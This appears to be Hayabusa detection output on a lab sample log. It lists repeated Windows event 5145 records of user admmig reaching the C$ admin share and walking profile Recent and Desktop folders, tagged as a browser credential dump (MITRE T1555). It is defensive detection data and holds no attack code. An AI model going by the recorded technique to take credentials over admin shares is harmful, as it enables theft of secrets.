share.evtx +2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via 
network share.evtx +2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password 
Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop 
| IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | 